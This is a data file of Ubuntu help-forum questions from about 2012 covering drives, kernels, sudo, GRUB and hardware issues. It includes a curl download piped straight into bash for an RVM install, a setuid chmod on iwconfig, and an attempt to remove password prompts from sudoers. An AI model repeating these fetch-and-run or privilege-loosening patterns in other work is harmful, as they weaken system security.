209490	permissions on automounted ntfs drive	i have an external ntfs hard drive . it automounts with rwx rights for the active user . i am able to create directories , update files , write to existing files , change names of files , etc . what is n't working is creating new files . not in newly created directories , nor anywhere else . under windows my drive has currently only one user ( everyone ) with full access . i also tried using fstab and ntfs-3g to mount the drive with different kind of permissions , but the results are the same : i ca n't create new files . any suggestions on how to solve this ?
209492	dump video data from ram disk to the hard disk ?	this is the story : some online video streaming sites like www.putlocker.com wo n't allow adobe flash player to cache the streaming videos on your hard disk , so the users ca n't watch them offline . instead they use ram disk to cache the streaming videos . i was wondering , if there is a way to take off the data files i want , from the ram and store them on my hard disk ... ( may be by mounting the whole ram as a filesystem or by a code ) i know there are video downloaders out there , but this question is for educational purpose , and may also apply to the other kind of data types rather than videos . has anyone got a clue.. ? thanks in advance .
209493	ubuntu recognises other partitions but does not show the contents	i hold up my hand to confess i 'm an immigrant from microsoft and i use the computer as a tool , not a hobby . ubuntu ( 12.10 ) recognizes the partitions used for windows , e.g . my docs but not it 's contents . can i ever save there ? if not , can i copy ubuntu files to windows ?
209494	realtime audio via usb soundcard possible ?	i 've installed ubuntu on my nexus 7 ( using xfce desktop ) and using usb otg cable , connected my m-audio usb soundcard . my ambition is to be able to use ardour on my nexus 7 with the m-audio soundcard ( a perfect , portable sound studio ) . when plugging the m-audio in , it is recognized by the system ( so says dmesg ) but it does n't show up as an available soundcard in alsa-mixer . it may just be that the usb-audio alsa module is not loaded , but until bluetooth keyboard is working it 's a bit of a pain to investigate . also , trying to use the jack sound server via qjackctl just throws errors about alsa and dbus . just wondering if anyone knows if it 's viable at this early stage to at least get it all working , however buggy or if the possiblitly of this is a long way off at the moment ? with xfce installed , the system runs nice and quick so once bluetooth keyboard is working it will be possible to have mouse/keyboard and a usable system so i 'm hoping that professional audio will be an option on this device . if there is anything i can do to help in getting this working , please let me know .
209500	make gdm3 in ubuntu 12.10 show a list of available languages	the local computer pool is used by a large number of students that prefer to choose the language of the ubuntu desktop . not all want english . unfortunately , the gdm login manager does not present a list of available languages installed on the system . how to fix that ?
209503	unable to install rvm using curl	when i try to install the rvm using curl it displays the following message : - vverma @ l-vverma : ~ $ curl -l get.rvm.io | bash -s stable % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0curl : ( 7 ) could n't connect to host
209505	remove encryption from usb flash drive	it all started when i was attempting to format my pny usb drive because it was full of junk . when it asked me what type of file system , i selected fat but there was a checkbox below that said `` encrypt '' and i accidently checked it and continue . i had no choice but to come up with a passphrase for it , and so i did , thinking i was able to remove that encryption . but after that at disk utility i thought i would find a `` remove encryption '' button or something like that but i did n't . i tried formatting it to remove the encryption but it gives me an error : error formatting , the device is busy '' detail > > > one or more block devices are holding /dev/sdb/ . i am stuck , what should i do ?
209511	how to bisect upstream 12.10 kernel on 12.04 ?	i 'd like to locate a kernel regression on ubuntu mainline kernel ( from kernel-ppa/mainline - kernel ubuntu ) between quantal 3.6.1 and quantal 3.6.2 . i build on mint 13 maya ( which is based on ubuntu precise . i know it is not 100 % pure ubuntu , but i believe that in this case the difference should n't influence the relevance of the question in ask ubuntu ) : for this i tried to follow the kernel/kernelbisection - ubuntu wiki and issued the following commands ( 3445cb2e52e98dd2413bdc6bcccab475d3871dc1 was the commit returned by git bisect bad ) : git clone git : //git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git linux-stable git clone git : //kernel.ubuntu.com/ubuntu/kteam-tools.git path= $ path : /home/adam/tmp/kteam-tools/mainline-build cd linux-stable git remote add quantal git : //kernel.ubuntu.com/ubuntu/ubuntu-quantal.git git bisect start git bisect good v3.6.1 git bisect bad v3.6.2 mainline-build-one 3445cb2e52e98dd2413bdc6bcccab475d3871dc1 quantal the last command returned : *** building : commit:3445cb2e52e98dd2413bdc6bcccab475d3871dc1 series : quantal abinum : ... full_version < 3.6.1 > version < 3.6.1 > long < v3.6.1-61-g3445cb2 > abinum < 030601 > checking out files : 100 % ( 8376/8376 ) , done . note : checking out 'quantal/master ' . you are in 'detached head ' state . you can look around , make experimental changes and commit them , and you can discard any commits you make in this state without impacting any branches by performing another checkout . if you want to create a new branch to retain commits you create , you may do so ( now or later ) by using -b with the checkout command again . example : git checkout -b new_branch_name head is now at 690e4b7 ... ubuntu : ubuntu-3.5.0-18.29 deleted branch build.030601 ( was a718e9e ) . checking out files : 100 % ( 8540/8540 ) , done . previous head position was 690e4b7 ... ubuntu : ubuntu-3.5.0-18.29 switched to a new branch 'build.030601' vvv - build head commit 3445cb2e52e98dd2413bdc6bcccab475d3871dc1 author : hugh dickins < hughd @ google.com > date : mon oct 8 16:33:14 2012 -0700 mm : fix invalidate_complete_page2 ( ) lock ordering commit ec4d9f626d5908b6052c2973f37992f1db52e967 upstream . in fuzzing with trinity , lockdep protested `` possible irq lock inversion dependency detected '' when isolate_lru_page ( ) reenabled interrupts while still holding the supposedly irq-safe tree_lock : invalidate_inode_pages2 invalidate_complete_page2 spin_lock_irq ( & mapping- > tree_lock ) clear_page_mlock isolate_lru_page spin_unlock_irq ( & zone- > lru_lock ) isolate_lru_page ( ) is correct to enable interrupts unconditionally : invalidate_complete_page2 ( ) is incorrect to call clear_page_mlock ( ) while holding tree_lock , which is supposed to nest inside lru_lock . both truncate_complete_page ( ) and invalidate_complete_page ( ) call clear_page_mlock ( ) before taking tree_lock to remove page from radix_tree . i guess invalidate_complete_page2 ( ) preferred to test pagedirty ( again ) under tree_lock before committing to the munlock ; but since the page has already been unmapped , its state is already somewhat inconsistent , and no worse if clear_page_mlock ( ) moved up . reported-by : sasha levin < levinsasha928 @ gmail.com > deciphered-by : andrew morton < akpm @ linux-foundation.org > signed-off-by : hugh dickins < hughd @ google.com > acked-by : mel gorman < mel @ csn.ul.ie > cc : rik van riel < riel @ redhat.com > cc : johannes weiner < hannes @ cmpxchg.org > cc : michel lespinasse < walken @ google.com > cc : ying han < yinghan @ google.com > signed-off-by : andrew morton < akpm @ linux-foundation.org > signed-off-by : linus torvalds < torvalds @ linux-foundation.org > signed-off-by : greg kroah-hartman < gregkh @ linuxfoundation.org > ^^^ - build head [ build.030601 73345fb ] base packaging 167 files changed , 133026 insertions ( + ) create mode 100644 debian.master/notes create mode 100644 debian.master/abi/3.5.0-17.28/abiname create mode 100644 debian.master/abi/3.5.0-17.28/amd64/generic create mode 100644 debian.master/abi/3.5.0-17.28/amd64/generic.compiler create mode 100644 debian.master/abi/3.5.0-17.28/amd64/generic.modules create mode 100644 debian.master/abi/3.5.0-17.28/armel/omap create mode 100644 debian.master/abi/3.5.0-17.28/armel/omap.compiler create mode 100644 debian.master/abi/3.5.0-17.28/armel/omap.modules create mode 100644 debian.master/abi/3.5.0-17.28/armhf/highbank create mode 100644 debian.master/abi/3.5.0-17.28/armhf/highbank.compiler create mode 100644 debian.master/abi/3.5.0-17.28/armhf/highbank.modules create mode 100644 debian.master/abi/3.5.0-17.28/armhf/omap create mode 100644 debian.master/abi/3.5.0-17.28/armhf/omap.compiler create mode 100644 debian.master/abi/3.5.0-17.28/armhf/omap.modules create mode 100644 debian.master/abi/3.5.0-17.28/fwinfo create mode 100644 debian.master/abi/3.5.0-17.28/i386/generic create mode 100644 debian.master/abi/3.5.0-17.28/i386/generic.compiler create mode 100644 debian.master/abi/3.5.0-17.28/i386/generic.modules create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc-smp create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc-smp.compiler create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc-smp.modules create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc64-smp create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc64-smp.compiler create mode 100644 debian.master/abi/3.5.0-17.28/powerpc/powerpc64-smp.modules create mode 100644 debian.master/abi/perm-blacklist create mode 100644 debian.master/changelog create mode 100644 debian.master/changelog.historical create mode 100644 debian.master/config/amd64/config.common.amd64 create mode 100644 debian.master/config/amd64/config.flavour.generic create mode 100644 debian.master/config/annotations create mode 100644 debian.master/config/armel/config.common.armel create mode 100644 debian.master/config/armel/config.flavour.omap create mode 100644 debian.master/config/armhf/config.common.armhf create mode 100644 debian.master/config/armhf/config.flavour.highbank create mode 100644 debian.master/config/armhf/config.flavour.omap create mode 100644 debian.master/config/config.common.ports create mode 100644 debian.master/config/config.common.ubuntu create mode 100644 debian.master/config/enforce create mode 100644 debian.master/config/i386/config.common.i386 create mode 100644 debian.master/config/i386/config.flavour.generic create mode 100644 debian.master/config/powerpc/config.common.powerpc create mode 100644 debian.master/config/powerpc/config.flavour.powerpc-smp create mode 100644 debian.master/config/powerpc/config.flavour.powerpc64-smp create mode 100644 debian.master/config/powerpc/ignore create mode 100644 debian.master/config/powerpc/ignore.modules create mode 100644 debian.master/config/ppc64/config.common.ppc64 create mode 100644 debian.master/config/ppc64/config.flavour.powerpc64-smp create mode 100644 debian.master/control.d/flavour-control.stub create mode 100644 debian.master/control.d/generic.inclusion-list create mode 100644 debian.master/control.d/vars.generic create mode 100644 debian.master/control.d/vars.highbank create mode 100644 debian.master/control.d/vars.omap create mode 100644 debian.master/control.d/vars.powerpc-smp create mode 100644 debian.master/control.d/vars.powerpc64-smp create mode 100644 debian.master/control.stub.in create mode 100644 debian.master/copyright create mode 100644 debian.master/d-i/exclude-firmware.armel-omap create mode 100644 debian.master/d-i/exclude-firmware.armhf-highbank create mode 100644 debian.master/d-i/exclude-firmware.armhf-omap create mode 100644 debian.master/d-i/exclude-modules.amd64-virtual create mode 100644 debian.master/d-i/exclude-modules.armel-omap create mode 100644 debian.master/d-i/exclude-modules.armhf-highbank create mode 100644 debian.master/d-i/exclude-modules.armhf-omap create mode 100644 debian.master/d-i/exclude-modules.i386-virtual create mode 100644 debian.master/d-i/exclude-modules.ia64 create mode 100644 debian.master/d-i/exclude-modules.powerpc create mode 100644 debian.master/d-i/exclude-modules.sparc create mode 100644 debian.master/d-i/firmware/readme.txt create mode 100644 debian.master/d-i/firmware/nic-modules create mode 100644 debian.master/d-i/firmware/scsi-modules create mode 100644 debian.master/d-i/kernel-versions.in create mode 100644 debian.master/d-i/modules-powerpc/block-modules create mode 100644 debian.master/d-i/modules-powerpc/message-modules create mode 100644 debian.master/d-i/modules-powerpc/nic-modules create mode 100644 debian.master/d-i/modules-powerpc/scsi-modules create mode 100644 debian.master/d-i/modules-powerpc/storage-core-modules create mode 100644 debian.master/d-i/modules-sparc/block-modules create mode 100644 debian.master/d-i/modules-sparc/message-modules create mode 100644 debian.master/d-i/modules/block-modules create mode 100644 debian.master/d-i/modules/crypto-modules create mode 100644 debian.master/d-i/modules/fat-modules create mode 100644 debian.master/d-i/modules/fb-modules create mode 100644 debian.master/d-i/modules/firewire-core-modules create mode 100644 debian.master/d-i/modules/floppy-modules create mode 100644 debian.master/d-i/modules/fs-core-modules create mode 100644 debian.master/d-i/modules/fs-secondary-modules create mode 100644 debian.master/d-i/modules/input-modules create mode 100644 debian.master/d-i/modules/ipmi-modules create mode 100644 debian.master/d-i/modules/irda-modules create mode 100644 debian.master/d-i/modules/md-modules create mode 100644 debian.master/d-i/modules/message-modules create mode 100644 debian.master/d-i/modules/mouse-modules create mode 100644 debian.master/d-i/modules/multipath-modules create mode 100644 debian.master/d-i/modules/nfs-modules create mode 100644 debian.master/d-i/modules/nic-modules create mode 100644 debian.master/d-i/modules/nic-pcmcia-modules create mode 100644 debian.master/d-i/modules/nic-shared-modules create mode 100644 debian.master/d-i/modules/nic-usb-modules create mode 100644 debian.master/d-i/modules/parport-modules create mode 100644 debian.master/d-i/modules/pata-modules create mode 100644 debian.master/d-i/modules/pcmcia-modules create mode 100644 debian.master/d-i/modules/pcmcia-storage-modules create mode 100644 debian.master/d-i/modules/plip-modules create mode 100644 debian.master/d-i/modules/ppp-modules create mode 100644 debian.master/d-i/modules/sata-modules create mode 100644 debian.master/d-i/modules/scsi-modules create mode 100644 debian.master/d-i/modules/serial-modules create mode 100644 debian.master/d-i/modules/speakup-modules create mode 100644 debian.master/d-i/modules/squashfs-modules create mode 100644 debian.master/d-i/modules/storage-core-modules create mode 100644 debian.master/d-i/modules/usb-modules create mode 100644 debian.master/d-i/modules/virtio-modules create mode 100644 debian.master/d-i/modules/vlan-modules create mode 100644 debian.master/d-i/package-list create mode 100644 debian.master/etc/getabis create mode 100644 debian.master/etc/kernelconfig create mode 100644 debian.master/rules.d/amd64.mk create mode 100644 debian.master/rules.d/armel.mk create mode 100644 debian.master/rules.d/armhf.mk create mode 100644 debian.master/rules.d/i386.mk create mode 100644 debian.master/rules.d/powerpc.mk create mode 100644 debian.master/rules.d/ppc64.mk create mode 100644 debian/commit-templates/bumpabi create mode 100644 debian/commit-templates/config-updates create mode 100644 debian/commit-templates/external-driver create mode 100644 debian/commit-templates/missing-modules create mode 100644 debian/commit-templates/newrelease create mode 100644 debian/commit-templates/sauce-patch create mode 100644 debian/commit-templates/upstream-patch create mode 100644 debian/compat create mode 100644 debian/control-scripts/headers-postinst create mode 100644 debian/control-scripts/postinst create mode 100644 debian/control-scripts/postrm create mode 100644 debian/control-scripts/preinst create mode 100644 debian/control-scripts/prerm create mode 100644 debian/debian.env create mode 100644 debian/docs/readme.inclusion-list create mode 100755 debian/rules create mode 100644 debian/rules.d/0-common-vars.mk create mode 100644 debian/rules.d/1-maintainer.mk create mode 100644 debian/rules.d/2-binary-arch.mk create mode 100644 debian/rules.d/3-binary-indep.mk create mode 100644 debian/rules.d/4-checks.mk create mode 100644 debian/rules.d/5-udebs.mk create mode 100755 debian/scripts/abi-check create mode 100755 debian/scripts/config-check create mode 100755 debian/scripts/control-create create mode 100755 debian/scripts/link-headers create mode 100755 debian/scripts/misc/get-firmware create mode 100755 debian/scripts/misc/getabis create mode 100755 debian/scripts/misc/git-ubuntu-log create mode 100755 debian/scripts/misc/insert-changes.pl create mode 100755 debian/scripts/misc/insert-mainline-changes create mode 100755 debian/scripts/misc/insert-ubuntu-changes create mode 100755 debian/scripts/misc/kernelconfig create mode 100755 debian/scripts/misc/retag create mode 100755 debian/scripts/misc/splitconfig.pl create mode 100755 debian/scripts/module-check create mode 100755 debian/scripts/module-inclusion create mode 100644 debian/scripts/sub-flavour create mode 100644 debian/source/format create mode 100644 debian/stamps/keep-dir create mode 100644 debian/tests/readme create mode 100755 debian/tests/check-aliases create mode 100644 debian/tools/generic create mode 100644 debian/tools/perf create mode 100644 debian/tools/turbostat create mode 100644 debian/tools/x86_energy_perf_policy *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0001-disable-comedi.patch ( drivers/staging/comedi/drivers/das08_cs.c 47a4f33c4733880faa50f0e64a6e5c8f 77bbbfcea08c959f4b17ed4272e0083e ) ... md5sum : drivers/staging/ti-st/st_kim.c : no such file or directory *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0002-disable-ti-st.patch ( drivers/staging/ti-st/st_kim.c b41944e0c30683bdedb6a66e11098892 ) ... md5sum : drivers/staging/hv/hv_mouse.c : no such file or directory *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0003-disable-hyperv.patch ( drivers/staging/hv/hv_mouse.c afd5524c29871a8293518f0be50a7474 ) ... *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0004-disable-olpc.patch ( drivers/staging/olpc_dcon/olpc_dcon_xo_1.c 13b325ae1aeee7f8602759057ed0d1f9 a8aee429e1dbd6fdf5a8be09dedc7332 ) ... *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0005-ubuntu-olpc_dcon_xo_1-needs-delay.h.patch ( drivers/staging/olpc_dcon/olpc_dcon_xo_1.c 6a0ae9f73f4878052202473bb952d6e4 a8aee429e1dbd6fdf5a8be09dedc7332 ) ... *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0006-ubuntu-olpc_dcon_xo_1_5-needs-delay.h.patch ( drivers/staging/olpc_dcon/olpc_dcon_xo_1_5.c 55c01b13d520fa0cdde88d8d3034f21c 09a07c715554c64673bd2a5db9ee4cd5 ) ... *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0007-x86-idle-apm-requires-pm_idle-always-when-it-is-a-mo.patch ( arch/x86/kernel/process.c 1ded15dd3a3cb622df182d60160ff826 d2a6ac2dee9787c1beff18733b53b56b ) ... *** checking /home/adam/tmp/kteam-tools/mainline-build/adhoc/0008-ubuntu-packaging-do-not-fail-secure-copy-on-older-ke.patch ( debian/rules.d/2-binary-arch.mk 647c141b53e037781844f0c04234526e cf586e029973c823e501eca040cb73e2 ) ... [ build.030601 6ba0d7f ] debian changelog 1 file changed , 5 insertions ( + ) , 9042 deletions ( - ) rewrite debian.master/changelog ( 99 % ) precise-amd64 : chroot not found ( : : , ) i suspect it has something to do with the fact , that i build kernel for quantal on precise . maybe this path does n't support such cross-version building scenario . or maybe the tutorial missed something obvious to kernel hackers , which i did n't know . update : i figured i need to install the devscripts for the dch , but the problem persists ; i 've updated the output .
209512	lubuntu and backup software ?	i use unity and i appreciate the backup facilities incorporate since 12.04 ( deja dup ) . is it possible to use it with lubuntu ? one of the advantages of the integration of deja dup in unity is the possiblity to recover a file by a right clic in a directory where that file was located . is it possible to do that in lubuntu ?
209514	how to step up my cpu 's frequency ?	i installed xubuntu 12.10 in a fujitsu siemens laptop with intel pentium m processor 1.86ghz . i noticed that the processor 's frequency that the `` system information '' mentions is only 800mhz ( step down frequency ) . how can i step up the frequency up to the processor 's maximum ( 1.86ghz ) ?
209517	does `` diff '' exist for images ?	you can compare two text files very easy with diff and even better with meld : if you use diff for images , you get an example like this : $ diff zivi-besch.tif zivildienst.tif binary files zivi-besch.tif and zivildienst.tif differ here is an example : original from http : //commons.wikimedia.org/wiki/file : tux.svg edited : i 've added a white background to both images and applied gimps `` difference '' filter to get this : it is a very simple method how a diff could work , but i can imagine much better ( and more complicated ) ones . do you know a program which works for images like meld does for texts ? ( if a program existed that could give a percentage ( 0 % the same image - 100 % the same image ) i would also be interested in it , but i am looking for one that gives me visual hints where differences are . )
209518	unity and dash displayed under all active windows	when ubuntu starts , the unity toolbar is displayed at the background and all windows are displayed above it . when i hit the super button on my keyboard , the dash opens but remains at the background so it 's unusable . i found out that closing my session and re-opening a session fixes the problem . does anyone have a better solution ? seems like unity/compiz are starting on the wrong order .
209519	how to increase the space in ubuntu installed under windows7 ?	i have windows7 running on my pc which has only one partition ( c : ) . i have installed ubuntu to make it a dual boot . after i installed few applications , i get and error saying no enough free space left . can someone help me in finding out how to increase the memory without re-installing/ losing the data . thanks in advance .
209526	problem in software updater	i got error in update-manager w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . how do i resolve it ?
209529	imagick php5 addon on ubuntu 64bit is n't working	i have a lampp webserver and i need to edit animated gif files . i have tried to install imagick with this tutorial . but at the `` make '' commad i get the error ca n't read /usr/lib/x86_64-linux-gnu/libjpeg.la : no such file or directory i already managed to install the 32bit version , but the server gives me an error : warning : php startup : unable to load dynamic library '/opt/lampp/lib/php/extensions/no-debug-non-zts-20090626/imagick.so ' - /opt/lampp/lib/php/extensions/no-debug-non-zts-20090626/imagick.so : wrong elf class : elfclass64 in unknown on line 0 i googeld the error and someone said , that the server want a 64bit version of the file ... i 'm new to compiling files and never installed addons on my webserver ... if you need aditional informations , logs or some file , please tell me ( sorry for my bad english : d )
209534	ubuntu 12.10 amd64 , ca n't update	i am getting this error message when trying to update . w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] , w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . and this error halts the updating process , so it never updates . how to fix it ? thanks , alex
209538	unable to start the web application from localhost:3000 ( ruby on rails )	i had created a demo web application by executing rails tickets and then i executed rails script/server to run it on localhost . initially i was able to execute the application in the browser by typing localhost:3000 in the address bar , but then i deleted the folder tickets from my hard disk . now again i created the same folder but when i try to run it using the same command rails script/server it says that vverma @ l-vverma : ~/railsexp/tickets $ rails script/server create file exists - script/server i tried deleting the script/server file but i still could n't run the localhost:3000 in the browser tried rails s as well , it gave the following output : - http : //paste.ubuntu.com/1317610/ but still i was unable to run the app on 'localhost:3000' what is the solution to this
209539	black screen after boot , no command working , not even terminal	i have ubuntu with latest kde on a lenovo z570 with optimus . i 've installed drivers and bumblebee , both integrated and nvidia cards are working perfect ( not the issue ) . i have a rat 9 wirless mouse , which i tried to configure and this is the problem . i needed to edit xorg.conf in order to make it work . but apparently i did not have any file xorg.conf in either /etc/x11 or /usr/share/x11 . by the way , xorg.conf or xorg.conf.d ? i 've looked for both but i 've found none . so i created the folder xorg.conf.d in /etc/x11/xorg.conf.d/ and created the file 910-rat.conf , where i created the section `` inputclass '' with the identifier , product , button mapping and everything . saved , rebooted , got stuck . normal boot : after the boot logo ( 5 charging dots ) i get the black screen . i tried ctrl+alt+f1 , ctrl+f1 , ctrl+alt+f5 , i 've tried editing the startup parameters in grub , with nomodeset instead of quiet splash , and the init=/bin/bash trick ... but to no avail . recovery mode : stuck at : [ 2.315147 ] freeing unused kernel memory loading , please wait ... [ 2.32 ... ] udevd [ 108 ] : starting version 175 [ 2.35 ... ] r8169 gigabit ethernet ... ... ( some more pci and eth0 ) [ 2.359.. ] [ drm ] initialized drm 1.1.0 20060810 [ 2.36 ... ] pci ... pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.370.. ] fb : conflicting fb hw usage inteldrmfb vs efo vga - removing generic driver and that 's it ... i just found out drivers from nvidia are not recommended , i do n't remember if i installed from nvidia or xswap ... something repo , or both . but what do i do now ? i would prefer not to reinstall ubuntu , as my kde setting took me like a week to set , and i do n't know where they are stored , as i do n't have a xorg.conf file . why do n't i have it ?
209540	cisco precisionhd usb camera ( detected but no video )	i 'm having an issue with my cisco precisionhd usb camera . it is detected but does not show video ( using `` cheese webcam booth '' ) . any ideas ? ( i 'm a newbie with ubuntu ) specs : ubuntu 12.10 32bit dell latitude e6400 cisco precisionhd usb camera ( usb 2.0 ) connected directly into laptop ( no docking station ) troubleshooting : using the command lsusb , i find the following device : bus 002 device 003 : id 1f82:0001 tandberg precisionhd camera '+ more devices like audio , finger swipe , linux foundation 2.0 , 1.1 so what now ? thanks . mb
209545	uninstalling ubuntu dual-boot bootrec issues	so on my laptop i am currently planning on uninstalling ubuntu 12.04 so i can upgrade my windows 7 partition to windows 8 , then install ubuntu 12.10 . my issue being that when i boot the windows 7 recovery disk , i believe i need to use cmd to run bootrec /fixboot and bootrec /fixmbr . now , whilst fixmbr works , fixboot yields me with an error regarding an unrecognised volume . when i turn on my pc now , i am no longer met the grub option , so i boot straight into windows . my question is : as such , do i still need to have fixboot run or can i just format and resize the partitions now even with the error when running fixboot ?
209546	how to set uefi on my ubuntu 12.04 for better performance ?	i want to set uefi on my ubuntu 12.04 . my specifications are intel core i3 540m intel dh55tc chipset motherboard 500 gb hdd 2 gb ram
209550	ca n't enable bluetooth because of adapter	i ca n't use my bluetooth with ubuntu 12.04 64bit . i have installed bluetooth , gnome-bluetooth and blueman packages . but i 'm getting no adapter found error . eray @ eray-vaio-ubuntu : ~ $ sudo hciconfig hci0 reset [ sudo ] password for eray : ca n't init device hci0 : connection timed out ( 110 ) eray @ eray-vaio-ubuntu : ~ $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : sony-wifi : wireless lan soft blocked : no hard blocked : no 3 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no eray @ eray-vaio-ubuntu : ~ $ sudo hciconfig sony-bluetooth reset ca n't init device hci0 : connection timed out ( 110 ) eray @ eray-vaio-ubuntu : ~ $ i 'm remambering , i was able to use my bluetooth with ubuntu , about 7-8 months ago . so ubuntu supporting my bluetooth device . how can i install my bluetooth and solve this problem ? note , i 've read a lots of question about this . generally there are 3 answers . upgrade to 12.04 execute sudo hciconfig hci0 reset command unblock your device if it 's blocked . but as you seen , none of them helped me . because of this , i 'm asking this question.it 's not a duplicated question . additional datas these are dmesg messages about bluetooth : http : //paste.ubuntu.com/1324079/ this is exact result of lsusb -v : http : //paste.ubuntu.com/1324100/ ( i got could n't open device , some information will be missing error 9 times ! ) i have linux-firmware but not linux-firmware-nonfree
209558	how can i fix broken sudo - sudo : parse error in /etc/sudoers near line 23 ?	i am getting this error : sudo : parse error in /etc/sudoers near line 23 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin i was trying to disable password authentication so i do n't have to type password every time i want to install something , but i probably changed it in a not very good way . i am a newbie to ubuntu , i got sick of windows : ) so far i 've found some people suggesting booting in single user mode , but i 'm afraid of messing things up more . how can i fix this error ?
209560	how to install g77 on ubuntu 12.04	i want a workin g77 compiler on my ubuntu 12.04 64 bit laptop . so did the following : i change the sources.list by adding the following lines : deb http ... hu.archive.ubuntu.com/ubuntu/ hardy universe deb-src ..//hu.archive.ubuntu.com/ubuntu/ hardy universe deb http : ... hu.archive.ubuntu.com/ubuntu/ hardy-updates universe deb-src ..//hu.archive.ubuntu.com/ubuntu/ hardy-updates universe 2. then i on a terminal i did the following : sudo apt-get update sudo apt-get install g77 things looked very nice then . but when i tried to compile with g77 on my fortran77 program . i got the following errors : /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status 3 . why does n't the g77 work properly . many people need g77 why can not ubuntu offer a workable g77 ? 4 . please help me ! thanks from a ubuntu-beginner
209561	is there a gui to `visudo` ?	quite simply , is there a gui to visudo i can recommend to other users , and use for myself ? i have to set up a system where over 50 users have different sudo privileges and i need to juggle them all .
209566	permissions issue with conky getting essid , tried all the usual	conky ca n't get my wireless essid due to the wl kernel module and neither could my normal user account . if i did sudo iwconfig wlan0 it was fine , and if i ran conky as root it was fine , but i do n't want to do that . the solution was the here more specifically this link is what i followed , and it worked great . for awhile.. now it does n't work anymore and i 'm not sure why . it worked for my user acount . if i run iwconfig i see all the wireless info . if i enter $ { exec iwconfig wlan0 } in my conky config conky spits out all the wireless info , including ssid . but using conky 's built in $ { wireless_essid wlan0 } returns nothing for essid and 'not-associated ' for the ap mac . i 've tried all i can , including sudo chmod u+s /sbin/iwconfig ( which also worked before , but now fails to work for conky ) i should also clarify that i edited the udev rule to rename eth1 to wlan0 , as eth1 is the standard interface name that comes up with the wl driver .
209567	how to setup local ubuntu server that provides security updates to ubuntu desktop systems ?	i want to setup loacal ubuntu server that download and provide security updates from internet as per requirement of ubuntu desktop systems connected in local area network . how can i setup such server ?
209572	installing ubuntu in c drive of windows , delete files from other drives ?	i have 5 partitions of which c : is the windows partition which has nothing but windows installed . other drives contain important files . so will installing ubuntu on c : drive and replacing windows , delete files from other drives ?
209588	grub : linux command not found	i 'm having an issue and i hope someone can help me , i installed ubuntu 12.10 on my computer ( along side windows 7 ) from a live cd , but when i rebooted my computer after a succefull installation , i get grub prompt , when i type boot in it , it prints `` error 8 : kernel must be loaded before booting '' . so i searched and i found this link : loading ubuntu from grub , but when i type linux /vmlinuz root=/dev/sda5 i get this message `` warning ! no such command : linux '' does anybody have any idea about what i should do ? note that i reinstalled ubuntu but still get the same issue , and that this is not my first time installing ubuntu ( i installed a lot of versions a dozen of times before and this is the first time i face this issue ) . when i type : kernel /vmlinuz root=/dev/sda5 instead of : linux /vmlinuz root=/dev/sda5 i get error 15 : file not found ( i also tried sda4 since find /vmlinuz is printing hd ( 0,4 ) )
209590	how to disable popup `` sim pin unlock required '' ?	i installed ubuntu 12.10 on my lenovo w500 and this annoying popup keeps appearing on start up . the text sais : `` sim pin unlock required '' and `` the mobile broadband device 'ericsson f3507g ' requires a sim pin code before it can be used . '' ( for search engines ) i do not plan on using this device and i just want to disable this popup .
209591	no video signal after install	today i tried to install ubuntu 12.10 to my machine , but all the time i encountered the same problem , i successfully boot from ubuntu 12.04 dvd , and a purple background comes up with accessibility and keyboard icons at the bottom of the screen , then when you wait a while a monitor text comes up `` no signal '' ( keep in mind that this signal is only shown when there 's cable in the monitor hdmi plug ) , and nothing happens , a little later disk drive stops flashing meaning that disk finished being read . even if you reset the computer you still get no signal , you have to turn the power of and on again , and plug hdmi out and put it in again . my info : graphics card : ati/amd radeon hd 4850 connection to monitor : hdmi monitor : samsung syncmaster t220hd
209596	need to restart network interfaces and kill wpa_supplicant , how to fix ?	my workplace uses 802.11x authentication for their wifi network , and several times per day i get booted from the network and need to do the following : disable networking sudo kill -9 restart networking at this point , the machine will connect to the network just fine . i do n't see any weirdness in the syslog , and am running ubuntu 12.04 ( 64-bit ) . what could be wrong ?
209597	how do i change keyboards from the command line ?	how i change keyboard layouts from the command-line ? for example , i want to switch from english to hebrew . i 'm able to do it from lightdm with the little icon in the corner of my screen .
209605	cdc_acm not firing	i 've been trying to connect my arduino mega adk to my machine for the past week or so and i ca n't get it to work as ttyacmx under /dev is being created . my machine is on ubuntu 12.04 with the kernel of 3.2.0-32-generic . here 're the related dmesg : [ 8294.500275 ] usb 2-1.1 : usb disconnect , device number 3 [ 8306.416596 ] usb 2-1.1 : new full-speed usb device number 4 using ehci_hcd i 've tried the same hardware on a different machine also with ubuntu 12.04 and the same kernel and i 've got cdc_acm 6.2:1.0 ttyacm0 : usb acm device in my dmesg and it works just fine . i 've checked and cdc_acm is loaded on both the machines . any idea where this could have gone wrong ? thanks
